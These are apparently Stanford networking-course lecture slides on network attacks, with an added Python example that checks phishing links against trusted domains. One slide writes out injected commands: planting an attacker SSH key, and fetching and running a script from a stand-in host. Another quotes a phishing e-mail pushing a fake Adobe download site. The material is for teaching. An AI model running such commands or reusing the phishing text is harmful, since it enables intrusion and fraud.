l14 Security 1


Security

Three lectures about security
Today: attack
  - All kinds of bad things attackers can do over the network
Next lecture: defense building blocks
  - Techniques for protecting against these and other attacks
Next Thursday: secure protocols
Note: If you find these lectures interesting, consider taking CS155
  - If you've already taken 155, apologies for any redundancy

The big picture
Assume bad guys completely control the network
  - When you send a packet, you just give it to the bad guy
  - Bad guy drops, modifies, duplicates, or delivers packet at will
  - Or just inserts his/her own packets that purport to be from you
Rest of lecture will make this more concrete...

Some consequences
Consider servers with no cryptographic protection
  - Next lecture will talk about cryptography
You submit an order to an on-line store
  - Bad guy sees your packets, learns credit card number
  - Bad guy changes your shipping address to his/her own
You are logged into a web site using telnet
  - Bad guy injects evil commands
      echo bad-key >> .ssh/authorized_keys
      wget evil.org/botscript && sh ./botscript
Can't safely download patches from OS vendor
  - Might end up installing an attacker's evil patch

Three types of threat
Secrecy
  - Adversary reads your private messages
Integrity
  - Adversary modifies/forges messages from you
  - Receiver can't detect the change and processes them
Availability
  - Adversary can prevent you from communicating
Today's lecture:
  - How innocent mechanisms can leave systems open to all three types of threat

Warm up: phishing
From: Adobe News <[email protected]>
Subject: INTRODUCING UPGRADED ADOBE ACROBAT 2010

Adobe is pleased to announce new version upgrades for Adobe Acrobat 2010.
Advanced features include:
  - Collaborate across borders
  - Create rich, polished PDF files from any application that prints
  - Ensure visual fidelity
  - Encrypt and share PDF files more securely
  - Use the standard for document archival and exchange
To upgrade and enhance your work productivity today, go to:
http://www.adobe-acrobat-new-download.com/
To leave comments, please contact us at: [email protected]
Best regards,
Eric Williams
Adobe Acrobat

Danger: malicious servers
Who is adobe-acrobat-new-download.com?
  - PDF Reader Solutions, 1283 Avenue Street New York, NY 10028
  - All name servers in Russia
Visiting malicious servers is harmful
  - Web site has downloadable software for people to run
  - Infects your machine with virus
  - Then your machine can act as phishing web server
Lesson 1: don't talk to bad guys' domain names
Rest of lecture:
  - Even with correct IP address, can talk to bad guys
  - With correct DNS name, even more likely

Network-based access control
Many services base access control on IP addresses
  - E.g., mail servers allow relaying
  - NNTP, Web servers restrict access to particular IP addresses (E.g., usenet.stanford.edu, ACM digital library, ...)
  - NFS servers allow you to mount file systems...
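
The phishing warm-up above works because the link's host name contains the brand name without belonging to the vendor. The following is an added example, not part of the original slides: it contrasts a brand-substring check with a whole-label match against a trusted-domain list. The trusted list (adobe.com) and the `*.example` sample links are assumptions constructed for illustration.

```python
from urllib.parse import urlsplit

# Assumption: the domain(s) the vendor actually serves downloads from.
TRUSTED_DOMAINS = {"adobe.com"}

def link_host(url):
    """Return the lower-cased host a browser would contact, or None."""
    try:
        parts = urlsplit(url.strip())
    except ValueError:          # e.g. malformed IPv6 literal
        return None
    if parts.scheme not in ("http", "https"):
        return None
    host = parts.hostname       # drops any "user@" prefix and the port
    return host.rstrip(".").lower() if host else None

def is_trusted(url, trusted=TRUSTED_DOMAINS):
    """True only if the host is a trusted domain or a subdomain of one."""
    host = link_host(url)
    if host is None:
        return False
    # Compare whole DNS labels: "x.adobe.com" matches, "notadobe.com" does not.
    return any(host == d or host.endswith("." + d) for d in trusted)

def naive_is_trusted(url):
    """The weak check a hurried reader applies: brand name appears in the link."""
    return "adobe" in url.lower()

# Constructed sample links; only the first is taken from the slide's e-mail.
SAMPLE_LINKS = [
    "http://www.adobe-acrobat-new-download.com/",
    "http://adobe.com.evil.example/update",
    "http://www.adobe.com@evil.example/",
    "http://notadobe.com/",
    "https://get.adobe.com/reader/",
    "HTTP://WWW.ADOBE.COM./",
]

def audit(links):
    """Return (url, naive_verdict, strict_verdict) for each link."""
    return [(u, naive_is_trusted(u), is_trusted(u)) for u in links]

if __name__ == "__main__":
    for url, naive, strict in audit(SAMPLE_LINKS):
        print(f"naive={naive!s:5} strict={strict!s:5} {url}")
```

Even a correct host-name match only establishes which name was requested; as the slides go on to say, a correct name or IP address does not guarantee the peer is who it claims to be on a network the adversary controls.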

This note was uploaded on 04/02/2012 for the course CS 144 at Stanford.
